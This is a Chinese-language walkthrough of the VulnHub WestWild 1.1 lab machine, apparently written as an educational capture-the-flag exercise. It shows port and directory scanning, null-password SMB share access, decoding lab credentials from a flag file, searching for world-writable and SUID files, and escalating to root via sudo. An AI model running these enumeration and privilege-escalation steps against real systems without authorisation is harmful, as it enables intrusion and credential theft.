信息收集：

靶机地址：https://www.vulnhub.com/entry/westwild-11,338/

（1）主页给出靶机ip，kali跟靶机仅主机网卡就可以

（2）端口扫描

nmap 192.168.8.129 -p- -A -sV -Pn

（3）目录扫描，没啥发现

dirb http://192.168.8.129/

（4）访问80端口，f12查看源码，也没什么发现

（5）80端口没发现，从139和445这两个smb服务入手，枚举用户、查找共享文件夹

enum4linux 192.168.8.129

（6）这里看到有一个 wave 共享，访问一下，需要密码，扫描结果中有很多显示空密码，空密码连接成功

smbclient //192.168.8.129/wave

（7）查看当前目录下文件，看到一个 flag.txt ，下载下来查看

get FLAG1.txtRmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K

getshell：

（1）base64解码，得到 flag 1 ，以及一个账号密码

Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open

（2）ssh连接，连接成功

ssh wavex@192.168.8.129

提权：

（1）查看当前权限，suid、sudo等都没有可利用的

sudo -l
find / -user root -perm -4000 -print 2>/dev/null

（2）home下看到还有一个用户 aveng

（3）两个用户目录找了找，没看到啥东西，也没有计划任务，passwd没有写入权限，查看有没有可写文件

find  / -perm 0777 -type f 2>/dev/null

（4）查看文件内容，得到 aveng 用户的密码

cat  /usr/share/av/westsidesecret/ififoregt.sh
aveng:kaizen+80

（5）切换用户到 aveng

su aveng
kaizen+80

（6）查看当前权限

sudo -l

（7）显示为 all ，直接 sudo su 提权，提权成功

（8）在 /root 下发现 flag2 ，查看内容

Flag2{Weeeeeeeeeeeellco0o0om_T0_WestWild}